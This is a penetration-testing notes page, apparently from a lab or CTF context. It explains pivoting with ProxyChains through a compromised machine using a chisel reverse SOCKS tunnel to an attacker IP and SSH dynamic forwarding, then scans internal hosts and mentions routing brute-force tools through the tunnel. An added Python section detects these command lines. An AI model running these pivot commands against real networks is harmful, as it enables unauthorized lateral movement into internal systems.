
# Pivoting (ProxyChains)

Pivoting lets the attacker access the services and machines that the compromised machine is connected to.

Pivoting allows the attacker to enlarge the attack surface by performing actions as the network-connected machine.

![Image by VickieLi](/files/NMsZRYHwy6hHDEKWXF32)

Tools Required:

* ProxyChains

```bash
sudo apt install proxychains
```

* SSH / CHISEL

**NEED:** With proxychains, tools that are not available on the compromised machine (e.g. medusa) can be used from the attacker machine.

> kali -> proxychains -> compromised\_machine -> request for accessing from internal\_machine -> internal\_machine:80

## Exploitation

* Install proxychains on the attacker's machine
* Configure the port that proxychains will use, with the protocol set to a SOCKS proxy

```bash
sudo vi /etc/proxychains.conf

# comment out the last line (port 9050), which is used by Tor
# add the following
# socks5 127.0.0.1 <some port>
socks5 127.0.0.1 9051
```

* Perform dynamic port forwarding

### Chisel

* When SSH Password is not available, make use of chisel to perform
* Start a chisel server on the attacker machine

```bash
# attacker IP: 192.168.1.1
# syntax: ./chisel server -p {port} --reverse
./chisel server -p 1337 --reverse
```

* On the compromised machine, connect to the attacker's reverse connection

```bash
# syntax: chisel client {attacker IP}:{port on chisel server} R:socks
./chisel client 192.168.1.1:1337 R:socks # on a Debian-based machine
chisel.exe client 192.168.1.1:1337 R:socks # on a Windows machine
```

* Once the compromised machine has connected to the attacker's machine, the chisel server on the attacker's machine shows the port the proxy is listening on

```bash
2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
```

* By default chisel uses port 1080, so let's change the proxychains configuration to use this port (1080)

```bash
sudo vi /etc/proxychains.conf

# comment out the last line (port 9050), which is used by Tor
# add the following
socks5 127.0.0.1 1080
```

* Now we can execute commands with proxychains

```bash
proxychains nmap -p- internalIp
```

![Proxychains with chisel](/files/3jM5Jirw2XDbeZBG09TJ)

![Legend](/files/haExa2gnsoMVw8hLH1jN)

### SSH

* Perform dynamic port forwarding

```bash
ssh -D 9051 charix@10.10.10.84 # 9051 is the port configured in proxychains.conf file
```

* Once the connection is established, the attacker can use proxychains to work against the enlarged attack surface

![Proxychains with SSH](/files/SzOkHY82r4hus41FgMbA)

* Legend
  * 1 - Added port 9051 to the /etc/proxychains.conf file
  * 2 - Inspecting the activity on port 9051 on the attacker's machine
  * 3 - Dynamic port forwarding to the port configured in proxychains (`-D 9051`)
  * 4 - Activity on port 9051 on the attacker's machine
  * 5 - Grabbing the banner of the service running on port 25 on the compromised machine
  * 6 - Using proxychains to obtain the banner of the service on port 25 on the compromised machine

> Brute-force and automated attack tools can be used with proxychains
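
Seen from the monitoring side, both tunnels above show up in process command lines. The following Python detection logic is an added example, not part of the original page or of the chisel or OpenSSH projects; `classify`, `scan`, the rule names and the sample records are constructed for illustration, and it goes slightly beyond the page by also matching `R:<port>:socks` remotes and clustered ssh flags.

```python
import re

# chisel remotes that open a reverse SOCKS listener: "R:socks", "R:5000:socks"
CHISEL_REVERSE_SOCKS = re.compile(r"^R:(?:[^\s/]+:)?socks$")
# ssh -D, alone or closing a cluster of argument-less flags (for example -fND9051)
SSH_DYNAMIC = re.compile(r"^-[46AaCfGgKkMNnqsTtVvXxYy]*D(.*)$")

# Constructed process-creation records, built from the commands shown on this page.
SAMPLE_CMDLINES = [
    "./chisel client 192.168.1.1:1337 R:socks",
    r"C:\Users\Public\chisel.exe client 192.168.1.1:1337 R:socks",
    "ssh -D 9051 charix@10.10.10.84",
    "ssh -fND9051 charix@10.10.10.84",
    "/usr/local/bin/chisel client 192.168.1.1:1337 R:5000:socks",
    "ssh -p 22 charix@10.10.10.84",
    "./chisel server -p 1337 --reverse",
]


def classify(cmdline):
    """Return (rule, detail) when a command line sets up a SOCKS pivot, else None."""
    argv = cmdline.split()
    if not argv:
        return None
    exe = re.split(r"[\\/]", argv[0])[-1].lower()

    # Rule 1 (hypothetical name): chisel client with a reverse SOCKS remote.
    # Matched on arguments, so the executable's path and file name do not matter.
    if "client" in argv[1:]:
        after = argv[argv.index("client", 1) + 1:]
        remotes = [a for a in after if CHISEL_REVERSE_SOCKS.match(a)]
        if remotes:
            return ("chisel-reverse-socks", remotes[0])

    # Rule 2 (hypothetical name): OpenSSH client started with dynamic forwarding.
    # Limitation: words of a remote command after the destination are scanned too.
    if exe in ("ssh", "ssh.exe"):
        for i, arg in enumerate(argv[1:], start=1):
            m = SSH_DYNAMIC.match(arg)
            if m:
                spec = m.group(1) or (argv[i + 1] if i + 1 < len(argv) else "")
                return ("ssh-dynamic-forward", spec)
    return None


def scan(cmdlines):
    """Return [(cmdline, (rule, detail)), ...] for every flagged record."""
    return [(c, hit) for c in cmdlines if (hit := classify(c))]
```

On hosts that do not need SSH forwarding, setting `AllowTcpForwarding no` in `sshd_config` stops the `ssh -D` variant at the server side, independently of any command-line detection.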

